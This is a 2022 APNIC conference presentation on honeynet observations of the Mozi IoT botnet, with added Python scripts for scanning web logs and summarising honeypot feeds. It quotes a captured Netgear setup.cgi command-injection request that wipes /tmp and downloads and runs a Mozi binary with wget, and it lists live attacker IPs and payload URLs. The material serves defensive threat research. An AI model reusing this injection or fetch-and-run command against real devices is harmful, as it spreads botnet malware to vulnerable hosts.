Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022, delivered on 14 December 2022.
3. Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research & presentation
4. Background (Source of Data)
• APNIC Community Honeynet Project
o Collaboration with partners across AP
o Including capacity building related activities
• Honeypots & Honeynet
o Anything that interacts with the honeypots is suspect
o Confirmed with observed actions + artifacts (payload, logs, etc.)
• Types of Honeypots
o Telnet/SSH (Cowrie) ** relevant for this talk
o 100++ sensors
5. What We Observe
• Attacks that spread via
o SSH & Telnet bruteforce
o Exploiting _known_ vulnerabilities
• Nature of
o Malware - cryptominers, DDoS agents, etc.
o Source of attack == infected devices*
• Left of the Hack
o Observations on attacker’s infrastructure
o Bot recruitments
o Scripts, malware payload, traffic
• Attacks that no one pays attention to ☺
• Share feeds with network operators (DASH) & partners
[Figure: DDoS attack timeline. “Left of the Hack”: Build/Buy Infrastructure (write malware, infect devices, set up Command & Control). “The Hack”: the DDoS attack itself.]
6. Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k nodes)
• Targets IoT devices (MIPS, ARM, PPC and x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a DDoS attack
o Update executable from given URL
o Execute command via shell or system()
o DNS Spoofing
o HTTP Session Hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP-based exploits via the web interface of IoT devices
o Mainly Telnet**, FTP, SSH credential brute-force
7. Nmap scan of a host serving the binary
Nmap scan report for host-x.static.[redacted].net (219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (HTTP on port 53387). Shodan fingerprints the device as a DVR.
8. Mozi author “taken custody” by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still around?
9. 2022 - Still Active?
durian.fsck.my -- 93.56.202.158 [10/Oct/2022:14:24:55 +0900] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
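An added example (not part of the talk) of the log check suggested above: it parses access-log lines in either the standard layout or the vhost-first layout shown on the slide, decodes the query string so `+`/`%xx`-encoded commands are not missed, and reports the client, timestamp, status and the URL the injected command tried to fetch. The sample lines are constructed with TEST-NET addresses.

```python
import re
from urllib.parse import unquote_plus

# Client IP, [timestamp], "METHOD path HTTP/x", status. The leading fields are
# deliberately loose so both a standard access log and the vhost-first layout
# shown in the talk ("durian.fsck.my -- 1.2.3.4[...]", "GET/setup.cgi") parse.
LOG_RE = re.compile(
    r'(?P<client>\d{1,3}(?:\.\d{1,3}){3})[^\[]*\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s*(?P<path>\S+)\s+HTTP/[\d.]+"\s+(?P<status>\d{3})'
)
# Sample names the talk says to look for in webserver logs
MOZI_RE = re.compile(r'Mozi\.[am]\b', re.IGNORECASE)
# The download the injected shell command tries to perform (wget/curl <url>)
FETCH_RE = re.compile(r'(?:wget|curl)\s+(?:-\S+\s+)*(?P<url>https?://[^\s;&|]+)', re.IGNORECASE)


def scan_for_mozi(lines):
    """Return one record per log line whose request references Mozi.a or Mozi.m."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        # '+' and %xx encoding in the query string hide the command from a plain grep
        decoded = unquote_plus(m.group("path"))
        if not MOZI_RE.search(decoded):
            continue
        fetch = FETCH_RE.search(decoded)
        hits.append({
            "client": m.group("client"),
            "timestamp": m.group("ts"),
            "status": int(m.group("status")),
            "payload_url": fetch.group("url") if fetch else None,
        })
    return hits


# Constructed sample lines (TEST-NET addresses), modelled on the request in the slide
SAMPLE_LOG = [
    'durian.example -- 203.0.113.5[10/Oct/2022:14:24:55 +0900] "GET/setup.cgi?next_file=netgear.cfg'
    '&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.5:53157/Mozi.m+-O+/tmp/netgear;sh+netgear'
    '&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0',
    '198.51.100.7 - - [10/Oct/2022:14:25:01 +0900] "GET /index.html HTTP/1.1" 200 1532',
    '203.0.113.9 - - [10/Oct/2022:14:26:10 +0900] "GET /cgi-bin/x?cmd=wget%20http%3A%2F%2F203.0.113.9'
    '%3A40000%2FMozi.a HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan_for_mozi(SAMPLE_LOG):
        print(hit)
```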
10. Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar: http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Records (columns: timestamp, source IP (attacking/spreading), IP hosting binary:random_port, country, ASN):
o 2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o 2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o 2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o 2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o 2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o 2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o 2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
Observed sequence:
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.i
11. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
• SHA256: a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config
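An added example (not the project's own tooling) that works the honeypot feed described in the previous two slides: it parses records in the talk's CSV layout, keeps only the `IP:random_port/.i` pattern, flags whether the attacking host is also the one hosting the binary, lists the candidate paths the talk probes on that host, and counts hosts that recur across records. It only builds the candidate list and never fetches anything; the records are constructed with TEST-NET addresses and private-use ASNs.

```python
import re
from collections import Counter

# Feed record layout from the talk: timestamp, source IP (attacking/spreading host),
# defanged URL of the downloaded binary, country, ASN
DOT_I_RE = re.compile(r'^hxxps?://(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})/\.i$')
# File names the talk probes for on a host already known to serve ".i"
MOZI_CANDIDATES = ("mozi.a", "mozi.m", "Mozi.m", "Mozi.a", "config")


def parse_record(line):
    """Parse one CSV record; return None unless the URL is the IP:random_port/.i pattern."""
    ts, src, url, cc, asn = line.strip().split(",")
    m = DOT_I_RE.match(url)
    if not m:
        return None
    host, port = m.group("host"), int(m.group("port"))
    return {
        "timestamp": ts, "source_ip": src, "host": host, "port": port,
        "country": cc, "asn": int(asn),
        # the attacking device is also the one serving the payload
        "self_hosted": host == src,
        # paths to try on the same host:port when hunting for the Mozi samples/config
        "candidates": [f"{host}:{port}/{name}" for name in MOZI_CANDIDATES],
    }


def summarize(lines):
    """Count .i downloads, how many are self-hosted, and hosts seen more than once."""
    recs = [r for r in (parse_record(l) for l in lines) if r]
    hosts = Counter(r["host"] for r in recs)
    return {
        "total": len(recs),
        "self_hosted": sum(1 for r in recs if r["self_hosted"]),
        "hosts": dict(hosts),
        "repeat_hosts": sorted(h for h, n in hosts.items() if n > 1),
    }


# Constructed records in the talk's layout (TEST-NET addresses, private-use ASNs)
SAMPLE_FEED = [
    "2022-05-25T11:23:24.433026,203.0.113.10,hxxp://203.0.113.10:10035/.i,KR,64500",
    "2022-05-26T06:51:04.319952,198.51.100.23,hxxp://203.0.113.77:23349/.i,IR,64501",
    "2022-05-26T07:58:51.970983,198.51.100.40,hxxp://203.0.113.77:28681/.i,AU,64502",
    "2022-05-26T09:00:00.000000,198.51.100.41,hxxp://203.0.113.77:9000/other.sh,HK,64503",
]

if __name__ == "__main__":
    print(summarize(SAMPLE_FEED))
```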
14. IPs from AP Region (Last 7 Months)
[Snippet]
• 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common]
• 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative]
• 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender]
[Chart: IPs from AP region by operators (67% label visible).]
15. Mitigation & Remediation (not just Mozi)
• The Usual Advice
o Harden Device – Patch, Strong Credentials, Access Controls
▪ But whose job is it anyway to monitor & remediate?
▪ Vulnerabilities sustain ‘old’ worms & bots
o TL;DR – Same Story
o There must be a better way
o Responding after the fact
• Engagement with other stakeholders on the impact of insecure IoTs, Awareness, Policies, PSIRTs
• Strengthen collaboration & the Eco-system